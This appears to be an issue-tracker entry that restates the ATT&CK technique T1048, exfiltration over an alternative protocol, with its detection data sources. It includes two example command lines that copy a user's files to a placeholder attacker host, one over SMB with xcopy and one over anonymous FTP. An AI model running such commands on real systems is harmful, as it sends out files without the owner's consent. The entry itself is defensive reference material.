We're updating the issue view to help you get more done. 

Exfiltration Over Alternative Protocol

Description

Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different channels could include Internet Web services such as cloud storage.

Adversaries may leverage various operating system utilities to exfiltrate data over an alternative protocol.

SMB command-line example:

  • <code>net use \\\attacker_system\IPC$ /user:username password && xcopy /S /H /C /Y C:\Users
    * \\\attacker_system\share_folder\</code>

Anonymous FTP command-line exampleCitation: Palo Alto OilRig Oct 2016)

  • <code>echo PUT C:\Path\to\file.txt | ftp -A attacker_system</code>

id

T1048

tactic

exfiltration

datasources

Process monitoring
Network protocol analysis
Netflow/Enclave netflow
Process use of network
Packet capture
User interface

maturity

Not Tracked

Assignee

Unassigned
Configure